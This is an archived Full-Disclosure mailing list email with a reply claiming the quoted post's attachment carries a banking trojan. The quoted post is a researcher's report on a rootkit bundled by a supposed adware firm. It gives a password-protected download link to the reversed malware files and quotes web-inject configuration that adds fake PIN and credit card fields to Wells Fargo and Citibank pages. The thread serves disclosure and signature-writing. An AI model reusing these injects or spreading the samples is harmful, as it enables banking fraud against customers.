Why is this &quot;genius&quot; sending virus infected attachments to the list?&nbsp; <br>The Trojan Horse Infostealer.Bancos.Z is attached to his &quot;research data&quot;... it steals passwords and logs keystrokes entered into certain financial Web sites.
<br><br><br><br><div><span class="gmail_quote">On 3/12/07, <b class="gmail_sendername">Thierry Zoller</b> &lt;<a href="mailto:Thierry@zoller.lu">Thierry@zoller.lu</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Dear list,<br><br>Whoever deals with these poeple and thinks they are a benign Adware<br>company (and thus spreads their bundles.<br><br>Check this :<br>Ignoring the fact that they basicaly&nbsp;&nbsp;install a Rootkit, I attached a
<br>few files I reversed, they install a DLL that does not directly KEYLOG your<br>banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page<br>asking you to enter more details (like PIN, Magic Password etc), then
<br>capture that data and transmit it (I did no further investigation)<br><br><a href="http://secdev.zoller.lu/system32.zip">http://secdev.zoller.lu/system32.zip</a><br>Pass: 123<br><br>I am disgusted. They even created their own XML parser for this ...
<br><br>An extract of HTML code they inject :<br>-------------------------------------<br>&lt;inject<br>url=&quot;wellsfargo&quot;<br>before=&quot;name=userid autocomplete=&#39;off&#39;&gt;&lt;/DIV&gt;&quot;<br>what=&quot;
<br>&lt;DIV&gt;&lt;LABEL for=userid&gt;ATM PIN&lt;/LABEL&gt;:&lt;BR&gt;&lt;SPAN class=&#39;mozcloak&#39;&gt;&lt;INPUT id=pin&nbsp;&nbsp;tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete=&#39;off&#39;&gt;&lt;/SPAN&gt;&lt;/DIV&gt;
<br>&quot;<br>block=&quot;alt=Go&quot;<br>check=&quot;pin&quot;<br>quan=&quot;4&quot;<br>content=&quot;d&quot;<br>&gt;<br>&lt;/inject&gt;<br>------------------------------------<br><br>Attached the main files (pass 123), feel free to add this as HIPS or whatever
<br>signatures, those interested in a complete reversal can contact me<br>to receive the EXE in question.<br><br>I have no more time feel free to dig deeper.<br><br><br>I especialy liked this :<br>------------------------
<br>&lt;inject<br>url=&quot;<a href="http://citibank.com">citibank.com</a>&quot;<br>&lt;TR&gt;&lt;TD colspan=3 class=smallArial noWrap&gt;&lt;SPAN STYLE=&#39;color:red&#39;&gt;To prevent fraud enter your credit card information please:&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;
<br><br><br>Puke..<br><br>--<br><a href="http://secdev.zoller.lu">http://secdev.zoller.lu</a><br>Thierry Zoller<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br>